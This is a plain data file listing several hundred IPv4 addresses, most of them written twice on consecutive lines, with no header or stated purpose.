218.28.115.90
218.29.225.98
218.29.225.98
222.88.2.18
222.88.2.18
218.28.8.50
218.28.8.50
222.88.208.37
222.88.208.37
61.163.124.91
61.163.124.91
202.110.74.162
202.110.74.162
218.28.58.114
218.28.58.114
202.110.67.227
202.110.67.227
61.54.5.146
61.54.5.146
218.29.37.15
218.29.37.15
218.28.117.182
218.28.117.182
218.28.239.90
218.28.239.90
219.156.138.25
219.156.138.25
218.28.172.222
218.28.172.222
61.54.243.176
61.54.243.176
123.7.85.164
123.7.85.164
123.7.87.81
123.7.87.81
218.29.48.22
218.29.48.22
222.88.151.243
222.88.151.243
222.89.156.60
222.89.156.60
222.89.133.116
222.89.133.116
202.110.84.90
202.110.84.90
61.158.156.4
61.158.156.4
123.7.118.112
123.7.118.112
218.28.244.6
218.28.244.6
222.88.78.4
222.88.78.4
222.139.221.250
222.139.221.250
42.225.51.89
42.225.51.89
61.158.175.114
61.158.175.114
123.15.63.60
123.15.63.60
222.88.222.170
222.88.222.170
61.136.71.94
61.136.71.94
218.29.7.117
218.29.7.117
218.28.90.195
218.28.90.195
218.28.4.13
218.28.4.13
218.29.48.4
218.29.48.4
61.163.182.67
61.163.182.67
202.110.72.42
202.110.72.42
218.29.48.3
218.29.48.3
222.89.1.242
222.89.1.242
218.28.31.212
218.28.31.212
218.28.89.10
218.28.89.10
218.29.217.194
218.29.217.194
218.29.39.91
218.29.39.91
202.110.81.70
202.110.81.70
221.13.152.18
221.13.152.18
123.7.117.157
123.7.117.157
218.28.125.158
218.28.125.158
123.13.235.17
123.13.235.17
61.53.65.38
61.53.65.38
218.28.210.49
218.28.210.49
61.163.224.106
61.163.224.106
218.29.89.114
218.29.89.114
222.139.6.225
222.139.6.225
218.28.3.2
218.28.3.2
222.89.157.253
222.89.157.253
125.46.14.202
125.46.14.202
218.28.67.246
218.28.67.246
218.29.63.230
218.29.63.230
218.28.78.71
218.28.78.71
61.54.227.187
61.54.227.187
218.28.80.150
218.28.80.150
125.46.91.230
125.46.91.230
222.89.2.26
222.89.2.26
123.7.83.147
123.7.83.147
218.29.218.130
218.29.218.130
123.15.39.34
123.15.39.34
123.7.181.205
123.7.181.205
222.88.64.50
222.88.64.50
125.46.43.230
125.46.43.230
202.110.73.219
202.110.73.219
61.54.225.181
61.54.225.181
123.55.227.202
123.55.227.202
218.29.5.178
218.29.5.178
61.54.226.157
61.54.226.157
123.15.55.178
123.15.55.178
125.46.25.146
125.46.25.146
222.89.159.35
222.89.159.35
222.88.92.3
222.88.92.3
61.136.99.34
61.136.99.34
123.13.206.211
123.13.206.211
218.28.5.254
218.28.5.254
61.54.14.24
61.54.14.24
123.7.114.11
123.7.114.11
218.29.194.102
218.29.194.102
219.150.155.106
219.150.155.106
123.7.14.132
123.7.14.132
61.136.115.187
61.136.115.187
202.110.74.170
202.110.74.170
221.13.156.150
221.13.156.150
123.7.62.183
123.7.62.183
125.46.16.91
125.46.16.91
218.28.112.182
218.28.112.182
218.29.6.233
218.29.6.233
218.28.58.178
218.28.58.178
123.7.14.105
123.7.14.105
171.9.112.205
171.9.112.205
222.88.155.54
222.88.155.54
202.110.67.24
202.110.67.24
222.89.1.175
222.89.1.175
218.28.71.187
218.28.71.187
222.89.11.111
222.89.11.111
61.163.37.145
61.163.37.145
61.136.115.249
61.136.115.249
61.54.14.69
61.54.14.69
222.85.68.186
222.85.68.186
61.163.33.59
61.163.33.59
123.7.83.206
123.7.83.206
202.110.67.16
202.110.67.16
1.195.129.10
1.195.129.10
61.163.180.66
61.163.180.66
222.141.66.209
222.141.66.209
222.139.6.205
222.139.6.205
123.7.55.167
123.7.55.167
218.29.169.38
218.29.169.38
115.56.226.6
115.56.226.6
222.138.65.81
222.138.65.81
222.139.221.170
222.139.221.170
219.154.38.34
219.154.38.34
171.15.254.146
171.15.254.146
218.29.238.22
218.29.238.22
61.54.245.112
61.54.245.112
221.15.44.84
221.15.44.84
218.28.88.243
218.28.88.243
61.163.33.55
61.163.33.55
61.163.26.210
61.163.26.210
171.15.254.80
171.15.254.80
182.123.224.13
182.123.224.13
171.15.254.82
171.15.254.82
61.163.38.101
61.163.38.101
61.54.14.108
61.54.14.108
61.54.3.59
61.54.3.59
61.163.37.2
61.163.37.2
61.163.124.84
61.163.124.84
115.56.225.166
115.56.225.166
61.163.82.42
61.163.82.42
218.28.53.78
218.28.53.78
218.28.182.186
218.28.182.186
222.138.67.39
222.138.67.39
222.89.247.28
222.89.247.28
61.54.13.73
61.54.13.73
218.28.142.234
218.28.142.234
61.158.155.70
61.158.155.70
202.110.74.186
202.110.74.186
218.28.22.218
218.28.22.218
222.88.212.66
222.88.212.66
61.163.24.246
61.163.24.246
218.29.88.62
218.29.88.62
61.163.164.56
61.163.164.56
222.89.11.140
222.89.11.140
222.88.219.46
222.88.219.46
218.28.88.58
218.28.88.58
125.46.2.134
125.46.2.134
218.28.138.74
218.28.138.74
123.163.198.243
123.163.198.243
218.28.53.242
218.28.53.242
123.7.113.46
123.7.113.46
218.28.86.237
218.28.86.237
218.28.56.58
218.28.56.58
218.28.55.8
218.28.55.8
61.53.64.30
61.53.64.30
218.28.52.70
218.28.52.70
61.54.225.20
61.54.225.20
222.139.215.115
222.139.215.115
61.163.163.29
61.163.163.29
61.54.213.44
61.54.213.44
221.13.228.6
221.13.228.6
61.158.172.181
61.158.172.181
218.28.190.45
218.28.190.45
218.29.48.2
218.29.48.2
218.28.87.139
218.28.87.139
123.7.82.19
123.7.82.19
218.28.244.222
218.28.244.222
222.138.69.165
222.138.69.165
202.110.85.90
202.110.85.90
123.7.113.26
123.7.113.26
218.28.100.182
218.28.100.182
61.163.94.226
61.163.94.226
125.46.4.169
125.46.4.169
61.136.115.133
61.136.115.133
218.28.111.246
218.28.111.246
123.55.118.49
123.55.118.49
222.88.151.52
222.88.151.52
218.28.55.86
218.28.55.86
218.28.56.114
218.28.56.114
125.46.89.244
125.46.89.244
218.28.94.92
218.28.94.92
219.154.75.60
219.154.75.60
222.141.17.18
222.141.17.18
222.88.149.40
222.88.149.40
1.192.156.137
1.192.156.137
218.28.57.151
218.28.57.151
221.13.130.142
221.13.130.142
123.7.88.198
123.7.88.198
219.150.211.130
219.150.211.130
61.163.7.245
61.163.7.245
202.110.72.178
202.110.72.178
61.158.172.234
61.158.172.234
61.163.38.9
61.163.38.9
61.158.187.191
61.158.187.191
202.110.75.238
202.110.75.238
218.28.56.90
218.28.56.90
218.28.235.154
218.28.235.154
218.29.37.248
218.29.37.248
123.15.49.242
123.15.49.242
222.88.79.242
222.88.79.242
218.28.54.170
218.28.54.170
218.29.37.137
218.29.37.137
218.27.207.220
218.27.207.220
218.28.56.66
218.28.56.66
123.7.182.77
123.7.182.77
218.28.80.102
218.28.80.102
218.28.219.46
218.28.219.46
222.88.119.37
222.88.119.37
61.163.38.69
61.163.38.69
222.138.120.98
222.138.120.98
222.89.155.107
222.89.155.107
218.29.230.30
218.29.230.30
221.15.38.15
221.15.38.15
61.136.115.92
61.136.115.92
61.158.175.95
61.158.175.95
222.139.245.73
222.139.245.73
218.29.6.180
218.29.6.180
61.163.194.19
61.163.194.19
218.28.215.110
218.28.215.110
61.163.103.110
61.163.103.110
123.101.174.94
123.101.174.94
222.88.190.182
222.88.190.182
125.40.237.106
125.40.237.106
125.46.2.114
125.46.2.114
222.88.114.49
222.88.114.49
219.156.138.45
219.156.138.45
123.13.205.221
123.13.205.221
123.7.51.14
123.7.51.14
123.7.52.67
123.7.52.67
218.28.191.122
218.28.191.122
202.110.67.232
202.110.67.232
218.28.75.222
218.28.75.222
218.28.56.74
218.28.56.74
218.28.111.22
218.28.111.22
123.7.81.167
123.7.81.167
125.46.5.170
125.46.5.170
222.141.197.14
222.141.197.14
218.29.12.149
218.29.12.149
123.15.46.78
123.15.46.78
219.154.38.42
219.154.38.42
218.29.8.7
218.29.8.7
61.53.65.51
61.53.65.51
222.89.240.8
222.89.240.8
61.163.38.38
61.163.38.38
61.163.163.151
61.163.163.151
218.28.216.206
218.28.216.206
61.54.4.21
61.54.4.21
218.28.201.170
218.28.201.170
125.46.1.118
125.46.1.118
222.88.251.6
222.88.251.6
222.89.156.42
222.89.156.42
202.110.75.70
202.110.75.70
115.56.227.250
115.56.227.250
218.29.224.102
218.29.224.102
222.89.248.197
222.89.248.197
61.54.6.184
61.54.6.184
61.163.38.79
61.163.38.79
123.7.113.7
123.7.113.7
218.28.87.142
218.28.87.142
123.52.127.95
123.52.127.95
125.46.12.94
125.46.12.94
61.163.16.202
61.163.16.202
61.158.175.63
61.158.175.63
61.163.164.75
61.163.164.75
222.88.186.158
222.88.186.158
61.163.33.10
61.163.33.10
123.7.88.111
123.7.88.111
61.158.175.130
61.158.175.130
222.89.247.137
222.89.247.137
222.89.131.39
222.89.131.39
218.29.12.193
218.29.12.193
125.46.14.250
125.46.14.250
123.7.78.220
123.7.78.220
123.13.203.35
123.13.203.35
221.15.32.4
221.15.32.4
218.29.4.1
218.29.4.1
123.7.63.106
123.7.63.106
219.154.133.4
219.154.133.4
222.139.7.108
222.139.7.108
61.163.165.150
61.163.165.150
61.163.38.13
61.163.38.13
124.240.185.67
124.240.185.67
222.139.5.214
222.139.5.214
202.110.73.186
202.110.73.186
222.89.8.221
222.89.8.221
171.8.149.90
171.8.149.90
218.28.51.238
218.28.51.238
222.88.67.231
222.88.67.231
219.156.157.12
219.156.157.12
218.28.2.82
218.28.2.82
115.56.226.86
115.56.226.86
222.88.194.59
222.88.194.59
123.7.118.159
123.7.118.159
123.15.46.98
123.15.46.98
123.7.51.22
123.7.51.22
218.28.125.30
218.28.125.30
125.46.24.186
125.46.24.186
218.28.224.146
218.28.224.146
61.54.227.3
61.54.227.3
218.29.12.93
218.29.12.93
123.52.235.41
123.52.235.41
218.28.87.185
218.28.87.185
202.110.72.133
202.110.72.133
123.7.87.28
123.7.87.28
222.138.67.5
222.138.67.5
218.29.238.26
218.29.238.26
61.163.164.105
61.163.164.105
125.46.4.165
125.46.4.165
218.29.38.60
218.29.38.60
61.54.3.81
61.54.3.81
218.28.65.206
218.28.65.206
123.7.51.113
123.7.51.113
202.110.85.110
202.110.85.110
222.88.42.6
222.88.42.6
218.28.49.94
218.28.49.94
202.110.83.58
202.110.83.58
202.110.73.226
202.110.73.226
125.46.12.98
125.46.12.98
218.29.238.62
218.29.238.62
218.28.65.25
218.28.65.25
123.7.85.167
123.7.85.167
61.54.227.10
61.54.227.10
61.158.175.106
61.158.175.106
218.29.234.30
218.29.234.30
123.7.88.71
123.7.88.71
218.29.234.106
218.29.234.106
61.163.38.8
61.163.38.8
219.150.121.240
219.150.121.240
61.136.115.146
61.136.115.146
123.7.14.107
123.7.14.107
202.110.85.198
202.110.85.198
123.7.51.80
123.7.51.80
218.28.32.3
218.28.32.3
61.54.4.34
61.54.4.34
125.45.239.252
125.45.239.252
125.46.14.226
125.46.14.226
222.139.212.67
222.139.212.67
202.110.73.238
202.110.73.238
222.139.245.87
222.139.245.87
218.29.225.10
218.29.225.10
222.138.67.81
222.138.67.81
218.29.7.182
218.29.7.182
125.40.191.141
125.40.191.141
222.88.151.10
222.88.151.10
61.163.164.86
61.163.164.86
222.89.208.202
222.89.208.202
218.28.58.226
218.28.58.226
61.158.171.7
61.158.171.7
218.29.5.69
218.29.5.69
61.158.173.140
61.158.173.140
219.156.151.2
219.156.151.2
61.136.115.194
61.136.115.194
123.7.85.172
123.7.85.172
61.136.115.156
61.136.115.156
218.29.200.200
218.29.200.200
202.110.72.202
202.110.72.202
61.136.115.141
61.136.115.141
222.88.151.11
222.88.151.11
202.110.72.212
202.110.72.212
202.110.73.166
202.110.73.166
222.89.155.108
222.89.155.108
123.7.83.240
123.7.83.240
218.28.75.106
218.28.75.106
125.40.237.6
125.40.237.6
202.110.72.210
202.110.72.210
218.29.56.135
218.29.56.135
218.29.6.228
218.29.6.228
61.136.64.46
61.136.64.46
202.110.72.184
202.110.72.184
125.40.237.213
125.40.237.213
123.13.201.99
123.13.201.99
61.163.164.118
61.163.164.118
125.45.239.201
125.45.239.201
115.56.230.194
115.56.230.194
218.28.236.146
218.28.236.146
125.40.199.113
125.40.199.113
222.139.10.43
222.139.10.43
61.163.164.4
61.163.164.4
123.54.153.42
123.54.153.42
1.196.127.33
1.196.127.33
61.163.164.207
61.163.164.207
61.163.180.65
61.163.180.65
218.28.143.173
218.28.143.173
219.150.248.70
219.150.248.70
221.13.136.105
221.13.136.105
218.29.37.154
218.29.37.154
123.15.43.188
123.15.43.188
202.110.67.70
202.110.67.70
123.7.88.83
123.7.88.83
61.136.80.90
61.136.80.90
61.163.32.5
61.163.32.5
202.110.85.94
202.110.85.94
61.163.32.7
61.163.32.7
123.7.87.215
123.7.87.215
218.28.74.222
218.28.74.222
115.56.224.194
115.56.224.194
221.13.128.94
221.13.128.94
202.110.72.180
202.110.72.180
61.163.164.87
61.163.164.87
222.88.219.181
222.88.219.181
218.29.38.61
218.29.38.61
61.163.25.250
61.163.25.250
219.156.168.52
219.156.168.52
125.46.0.134
125.46.0.134
218.28.92.118
218.28.92.118
125.46.46.102
125.46.46.102
61.163.164.100
61.163.164.100
218.28.55.12
218.28.55.12
222.89.218.194
222.89.218.194
222.89.155.104
222.89.155.104
218.29.37.120
218.29.37.120
125.46.3.14
125.46.3.14
218.28.110.170
218.28.110.170
218.28.23.35
218.28.23.35
222.85.23.102
222.85.23.102
218.28.244.106
218.28.244.106
222.88.149.13
222.88.149.13
222.139.245.204
222.139.245.204
61.53.66.32
61.53.66.32
218.29.209.190
218.29.209.190
61.163.32.28
61.163.32.28
61.163.162.242
61.163.162.242
125.46.4.166
125.46.4.166
202.110.84.54
202.110.84.54
218.29.37.100
218.29.37.100
61.136.115.132
61.136.115.132
218.29.5.243
218.29.5.243
61.158.175.136
61.158.175.136
125.46.93.130
125.46.93.130
202.110.84.118
202.110.84.118
218.28.159.218
218.28.159.218
61.163.7.234
61.163.7.234
218.29.12.155
218.29.12.155
218.28.117.22
218.28.117.22
123.7.56.176
123.7.56.176
218.28.68.186
218.28.68.186
218.28.112.150
218.28.112.150
123.7.80.105
123.7.80.105
61.163.32.14
61.163.32.14
218.28.191.62
218.28.191.62
61.163.236.165
61.163.236.165
61.136.64.106
61.136.64.106
61.158.168.239
61.158.168.239
61.136.115.138
61.136.115.138
61.53.64.3
61.53.64.3
61.163.33.39
61.163.33.39
61.136.115.162
61.136.115.162
218.28.182.134
218.28.182.134
123.7.81.180
123.7.81.180
218.29.48.15
218.29.48.15
218.28.68.198
218.28.68.198
125.42.4.232
125.42.4.232
222.88.64.74
222.88.64.74
218.28.55.13
218.28.55.13
61.163.236.119
61.163.236.119
218.28.124.253
218.28.124.253
123.7.52.253
123.7.52.253
218.29.230.90
218.29.230.90
222.88.253.228
222.88.253.228
222.88.155.101
222.88.155.101
218.29.225.106
218.29.225.106
61.54.6.47
61.54.6.47
61.163.37.13
61.163.37.13
222.88.208.42
222.88.208.42
123.7.83.205
123.7.83.205
219.150.248.14
219.150.248.14
125.46.29.2
125.46.29.2
202.110.75.226
202.110.75.226
61.53.64.207
61.53.64.207
202.110.84.70
202.110.84.70
123.7.85.161
123.7.85.161
61.163.32.55
61.163.32.55
222.138.69.163
222.138.69.163
123.7.51.5
123.7.51.5
218.29.48.5
218.29.48.5
171.15.254.163
171.15.254.163
61.54.225.184
61.54.225.184
61.136.93.38
61.136.93.38
222.88.106.5
222.88.106.5
123.7.14.84
123.7.14.84
61.53.181.5
61.53.181.5
218.29.5.84
218.29.5.84
1.195.129.22
1.195.129.22
123.7.118.166
123.7.118.166
218.29.240.222
218.29.240.222
61.136.108.210
61.136.108.210
115.56.225.130
115.56.225.130
218.28.237.154
218.28.237.154
218.29.4.165
218.29.4.165
218.28.213.42
218.28.213.42
222.89.253.167
222.89.253.167
218.29.38.219
218.29.38.219
61.163.32.56
61.163.32.56
123.7.113.45
123.7.113.45
125.46.56.154
125.46.56.154
219.150.181.147
219.150.181.147
123.7.88.195
123.7.88.195
123.7.88.65
123.7.88.65
218.28.89.179
218.28.89.179
123.13.223.22
123.13.223.22
222.138.65.50
222.138.65.50
222.88.117.210
222.88.117.210
222.139.6.209
222.139.6.209
222.88.155.78
222.88.155.78
202.110.84.82
202.110.84.82
218.28.58.194
218.28.58.194
218.29.55.212
218.29.55.212
61.163.164.227
61.163.164.227
222.88.209.22
222.88.209.22
218.28.109.20
218.28.109.20
61.158.169.70
61.158.169.70
61.53.137.12
61.53.137.12
222.88.149.79
222.88.149.79
222.88.199.139
222.88.199.139
61.163.38.58
61.163.38.58
61.54.225.169
61.54.225.169
218.29.4.219
218.29.4.219
123.7.63.212
123.7.63.212
61.158.168.242
61.158.168.242
125.46.4.229
125.46.4.229
171.8.66.245
171.8.66.245
1.196.157.7
1.196.157.7
61.163.236.78
61.163.236.78
218.28.174.166
218.28.174.166
218.28.88.113
218.28.88.113
219.154.45.235
219.154.45.235
219.156.157.81
219.156.157.81
61.163.127.6
61.163.127.6
61.163.180.62
61.163.180.62
123.7.88.2
123.7.88.2
222.89.55.45
222.89.55.45
218.28.75.102
218.28.75.102
61.158.169.170
61.158.169.170
61.53.134.59
61.53.134.59
123.7.113.16
123.7.113.16
218.29.230.86
218.29.230.86
222.139.6.204
222.139.6.204
222.141.68.93
222.141.68.93
61.163.162.252
61.163.162.252
218.29.37.42
218.29.37.42
123.13.224.236
123.13.224.236
61.163.164.19
61.163.164.19
218.28.9.58
218.28.9.58
218.28.88.220
218.28.88.220
123.13.235.89
123.13.235.89
61.163.2.134
61.163.2.134
125.45.239.151
125.45.239.151
218.28.89.180
218.28.89.180
61.53.65.164
61.53.65.164
218.28.172.210
218.28.172.210
61.163.163.171
61.163.163.171
61.53.65.3
61.53.65.3
222.88.240.241
222.88.240.241
218.29.39.53
218.29.39.53
61.158.181.8
61.158.181.8
218.28.210.59
218.28.210.59
61.158.175.85
61.158.175.85
202.110.93.66
202.110.93.66
222.89.252.68
222.89.252.68
218.28.65.42
218.28.65.42
222.88.151.89
222.88.151.89
222.89.156.109
222.89.156.109
61.54.5.251
61.54.5.251
125.40.175.250
125.40.175.250
123.7.14.144
123.7.14.144
182.123.224.98
182.123.224.98
61.54.213.59
61.54.213.59
222.89.247.14
222.89.247.14
218.29.5.172
218.29.5.172
123.52.132.10
123.52.132.10
222.88.154.61
222.88.154.61
61.163.4.49
61.163.4.49
218.28.7.214
218.28.7.214
218.28.89.134
218.28.89.134
218.28.88.249
218.28.88.249
218.28.218.92
218.28.218.92
123.52.132.203
123.52.132.203
115.56.230.226
115.56.230.226
61.54.6.16
61.54.6.16
123.13.224.209
123.13.224.209
222.88.83.210
222.88.83.210
222.88.150.102
222.88.150.102
222.89.120.158
222.89.120.158
61.54.225.61
61.54.225.61
218.29.240.34
218.29.240.34
123.15.55.202
123.15.55.202
221.15.44.8
221.15.44.8
218.29.37.225
218.29.37.225
218.28.245.138
218.28.245.138
218.29.240.218
218.29.240.218
61.54.13.40
61.54.13.40
61.163.164.28
61.163.164.28
222.89.11.102
222.89.11.102
61.163.32.60
61.163.32.60
222.88.242.180
222.88.242.180
125.46.12.58
125.46.12.58
42.239.4.13
42.239.4.13
202.110.67.3
202.110.67.3
221.13.242.46
221.13.242.46
218.28.190.124
218.28.190.124
218.28.236.12
218.28.236.12
61.136.78.241
61.136.78.241
219.154.156.165
219.154.156.165
123.7.88.221
123.7.88.221
218.29.214.66
218.29.214.66
219.156.157.167
219.156.157.167
123.7.81.220
123.7.81.220
61.163.33.23
61.163.33.23
221.15.44.43
221.15.44.43
218.29.55.129
218.29.55.129
218.29.23.134
218.29.23.134
61.136.115.91
61.136.115.91
218.29.240.18
218.29.240.18
222.88.149.24
222.88.149.24
219.156.157.88
219.156.157.88
218.28.212.5
218.28.212.5
218.29.8.5
218.29.8.5
61.163.180.68
61.163.180.68
125.46.14.138
125.46.14.138
218.28.65.45
218.28.65.45
61.136.99.94
61.136.99.94
218.28.75.90
218.28.75.90
61.136.115.231
61.136.115.231
123.7.53.94
123.7.53.94
61.163.27.254
61.163.27.254
61.136.64.134
61.136.64.134
218.29.7.219
218.29.7.219
125.46.44.210
125.46.44.210
123.7.118.144
123.7.118.144
61.163.164.41
61.163.164.41
202.110.72.59
202.110.72.59
202.110.72.56
202.110.72.56
61.163.124.80
61.163.124.80
222.89.39.94
222.89.39.94
42.228.8.178
42.228.8.178
61.168.166.12
61.168.166.12
125.46.76.86
125.46.76.86
222.141.68.77
222.141.68.77
222.139.245.76
222.139.245.76
61.158.175.9
61.158.175.9
222.88.154.180
222.88.154.180
218.29.37.132
218.29.37.132
123.7.14.139
123.7.14.139
61.158.172.20
61.158.172.20
222.88.155.17
222.88.155.17
61.163.236.124
61.163.236.124
218.28.103.206
218.28.103.206
123.7.82.36
123.7.82.36
218.28.87.157
218.28.87.157
218.29.238.6
218.29.238.6
61.163.236.253
61.163.236.253
218.28.106.206
218.28.106.206
61.158.175.162
61.158.175.162
218.28.12.44
218.28.12.44
123.13.201.47
123.13.201.47
218.29.23.133
218.29.23.133
218.29.48.17
218.29.48.17
218.28.143.82
218.28.143.82
42.229.143.197
42.229.143.197
222.89.218.74
222.89.218.74
123.7.178.34
123.7.178.34
218.28.57.206
218.28.57.206
222.138.67.4
222.138.67.4
222.89.218.68
222.89.218.68
221.13.140.112
221.13.140.112
61.136.81.186
61.136.81.186
125.46.4.116
125.46.4.116
222.89.157.211
222.89.157.211
202.110.93.30
202.110.93.30
1.199.59.15
1.199.59.15
218.29.225.254
218.29.225.254
218.28.57.38
218.28.57.38
61.163.37.10
61.163.37.10
218.28.180.250
218.28.180.250
1.194.185.214
1.194.185.214
123.7.39.236
123.7.39.236
218.28.90.108
218.28.90.108
61.163.180.56
61.163.180.56
61.136.64.214
61.136.64.214
1.197.15.172
1.197.15.172
218.28.25.242
218.28.25.242
222.139.245.242
222.139.245.242
202.110.73.148
202.110.73.148
222.138.2.44
222.138.2.44
218.28.101.22
218.28.101.22
222.89.229.91
222.89.229.91
202.110.75.98
202.110.75.98
123.7.180.6
123.7.180.6
218.28.20.46
218.28.20.46
222.88.251.23
222.88.251.23
61.163.37.21
61.163.37.21
218.28.65.126
218.28.65.126
218.28.182.238
218.28.182.238
218.28.245.118
218.28.245.118
123.15.37.186
123.15.37.186
219.150.117.107
219.150.117.107
61.54.225.136
61.54.225.136
61.136.65.110
61.136.65.110
222.89.11.42
222.89.11.42
123.15.51.162
123.15.51.162
61.136.65.74
61.136.65.74
222.139.221.172
222.139.221.172
61.163.36.18
61.163.36.18
221.14.150.37
221.14.150.37
61.136.65.62
61.136.65.62
61.136.65.54
61.136.65.54
61.136.115.188
61.136.115.188
222.88.116.25
222.88.116.25
61.136.65.126
61.136.65.126
218.28.74.202
218.28.74.202
218.28.106.202
218.28.106.202
61.163.179.100
61.163.179.100
202.110.73.134
202.110.73.134
222.89.219.8
222.89.219.8
218.28.25.174
218.28.25.174
123.7.51.83
123.7.51.83
125.46.94.70
125.46.94.70
61.163.37.27
61.163.37.27
218.29.98.190
218.29.98.190
61.136.65.50
61.136.65.50
218.28.85.118
218.28.85.118
218.28.51.228
218.28.51.228
61.163.36.30
61.163.36.30
61.136.65.78
61.136.65.78
218.28.224.82
218.28.224.82
222.89.229.58
222.89.229.58
171.15.254.156
171.15.254.156
218.28.216.50
218.28.216.50
218.29.234.66
218.29.234.66
222.139.245.86
222.139.245.86
125.46.48.226
125.46.48.226
61.163.36.10
61.163.36.10
218.28.53.219
218.28.53.219
61.163.219.150
61.163.219.150
202.110.72.21
202.110.72.21
125.46.97.58
125.46.97.58
222.85.0.166
222.85.0.166
123.7.86.37
123.7.86.37
61.163.224.198
61.163.224.198
218.28.245.238
218.28.245.238
61.136.65.86
61.136.65.86
171.15.254.140
171.15.254.140
61.54.227.42
61.54.227.42
218.29.4.89
218.29.4.89
61.163.36.65
61.163.36.65
202.110.73.211
202.110.73.211
123.7.56.25
123.7.56.25
218.29.98.166
218.29.98.166
222.88.208.200
222.88.208.200
61.136.65.146
61.136.65.146
219.150.120.221
219.150.120.221
61.54.227.9
61.54.227.9
218.28.188.122
218.28.188.122
222.88.219.102
222.88.219.102
219.147.48.5
219.147.48.5
123.7.55.103
123.7.55.103
218.28.178.138
218.28.178.138
123.7.81.234
123.7.81.234
123.7.142.134
123.7.142.134
218.28.96.113
218.28.96.113
61.136.99.38
61.136.99.38
61.163.38.64
61.163.38.64
61.136.65.94
61.136.65.94
218.28.86.214
218.28.86.214
61.163.33.125
61.163.33.125
61.163.37.122
61.163.37.122
61.163.36.63
61.163.36.63
123.13.179.81
123.13.179.81
218.29.239.206
218.29.239.206
218.29.234.98
218.29.234.98
222.89.160.180
222.89.160.180
61.163.36.82
61.163.36.82
219.156.151.22
219.156.151.22
218.29.6.82
218.29.6.82
125.40.181.144
125.40.181.144
61.136.79.218
61.136.79.218
202.110.75.2
202.110.75.2
218.28.178.134
218.28.178.134
202.110.73.171
202.110.73.171
61.136.65.66
61.136.65.66
218.29.37.136
218.29.37.136
222.89.39.91
222.89.39.91
123.7.63.45
123.7.63.45
218.29.134.146
218.29.134.146
61.54.6.57
61.54.6.57
61.136.99.66
61.136.99.66
218.29.216.98
218.29.216.98
61.163.36.26
61.163.36.26
218.29.63.34
218.29.63.34
218.29.37.194
218.29.37.194
125.46.4.162
125.46.4.162
61.54.227.2
61.54.227.2
222.141.69.2
222.141.69.2
218.29.8.12
218.29.8.12
61.136.115.157
61.136.115.157
123.7.81.236
123.7.81.236
61.136.108.46
61.136.108.46
218.28.103.142
218.28.103.142
61.53.134.140
61.53.134.140
202.110.72.159
202.110.72.159
222.89.156.101
222.89.156.101
218.28.78.132
218.28.78.132
61.163.77.186
61.163.77.186
219.157.72.6
219.157.72.6
123.7.113.36
123.7.113.36
61.163.36.44
61.163.36.44
218.28.67.2
218.28.67.2
202.110.93.242
202.110.93.242
218.29.8.2
218.29.8.2
218.29.37.170
218.29.37.170
61.163.164.78
61.163.164.78
61.136.115.171
61.136.115.171
123.52.136.212
123.52.136.212
61.136.115.140
61.136.115.140
61.136.65.38
61.136.65.38
218.28.124.146
218.28.124.146
61.163.164.74
61.163.164.74
222.85.68.110
222.85.68.110
218.29.6.77
218.29.6.77
123.15.37.122
123.15.37.122
202.110.85.78
202.110.85.78
123.101.143.19
123.101.143.19
218.28.218.65
218.28.218.65
222.89.133.124
222.89.133.124
218.28.57.14
218.28.57.14
202.110.72.182
202.110.72.182
218.28.91.11
218.28.91.11
123.7.14.141
123.7.14.141
218.29.233.202
218.29.233.202
218.29.62.170
218.29.62.170
202.110.73.124
202.110.73.124
218.29.5.61
218.29.5.61
61.163.164.77
61.163.164.77
61.54.13.234
61.54.13.234
202.110.85.54
202.110.85.54
218.28.75.122
218.28.75.122
219.154.133.71
219.154.133.71
219.156.151.20
219.156.151.20
125.45.158.20
125.45.158.20
123.13.204.230
123.13.204.230
61.136.108.102
61.136.108.102
218.28.30.235
218.28.30.235
171.8.252.51
171.8.252.51
218.28.58.150
218.28.58.150
218.28.245.230
218.28.245.230
61.163.32.73
61.163.32.73
219.156.158.110
219.156.158.110
218.28.51.242
218.28.51.242
218.28.218.61
218.28.218.61
219.150.205.104
219.150.205.104
218.29.233.18
218.29.233.18
123.7.53.244
123.7.53.244
222.89.7.87
222.89.7.87
219.156.138.119
219.156.138.119
61.136.71.162
61.136.71.162
218.28.49.126
218.28.49.126
123.7.183.160
123.7.183.160
219.150.127.47
219.150.127.47
202.110.73.6
202.110.73.6
218.29.37.38
218.29.37.38
61.163.37.19
61.163.37.19
222.89.155.119
222.89.155.119
125.45.237.121
125.45.237.121
61.136.71.34
61.136.71.34
61.163.37.75
61.163.37.75
218.28.135.90
218.28.135.90
202.111.140.52
202.111.140.52
222.85.52.12
222.85.52.12
123.7.116.98
123.7.116.98
218.29.14.135
218.29.14.135
61.163.27.110
61.163.27.110
218.29.37.143
218.29.37.143
61.163.32.18
61.163.32.18
123.7.85.238
123.7.85.238
219.156.151.18
219.156.151.18
218.28.50.246
218.28.50.246
202.110.72.164
202.110.72.164
123.54.152.130
123.54.152.130
218.28.50.130
218.28.50.130
61.136.65.170
61.136.65.170
218.29.232.162
218.29.232.162
61.163.164.130
61.163.164.130
218.29.56.28
218.29.56.28
1.192.147.173
1.192.147.173
221.15.44.52
221.15.44.52
61.163.36.45
61.163.36.45
218.28.169.122
218.28.169.122
219.154.156.161
219.154.156.161
61.163.37.26
61.163.37.26
222.88.195.72
222.88.195.72
123.13.237.16
123.13.237.16
218.28.58.98
218.28.58.98
219.150.227.4
219.150.227.4
218.28.238.243
218.28.238.243
218.28.56.106
218.28.56.106
61.163.32.37
61.163.32.37
218.29.37.79
218.29.37.79
218.28.50.202
218.28.50.202
61.158.171.60
61.158.171.60
123.7.82.21
123.7.82.21
61.163.32.76
61.163.32.76
61.158.169.58
61.158.169.58
123.53.198.244
123.53.198.244
218.28.85.58
218.28.85.58
222.89.160.138
222.89.160.138
125.46.6.198
125.46.6.198
61.136.64.90
61.136.64.90
202.110.67.74
202.110.67.74
123.7.53.156
123.7.53.156
202.110.81.170
202.110.81.170
61.158.175.57
61.158.175.57
218.29.55.213
218.29.55.213
123.7.183.20
123.7.183.20
61.54.6.202
61.54.6.202
61.54.6.238
61.54.6.238
222.88.71.80
222.88.71.80
125.46.95.246
125.46.95.246
61.163.36.56
61.163.36.56
123.53.85.17
123.53.85.17
218.28.50.38
218.28.50.38
123.7.88.244
123.7.88.244
123.7.87.88
123.7.87.88
222.85.35.11
222.85.35.11
202.110.85.114
202.110.85.114
218.29.230.14
218.29.230.14
218.28.122.46
218.28.122.46
218.28.224.162
218.28.224.162
222.88.71.130
222.88.71.130
222.89.1.183
222.89.1.183
222.89.218.39
222.89.218.39
123.54.153.63
123.54.153.63
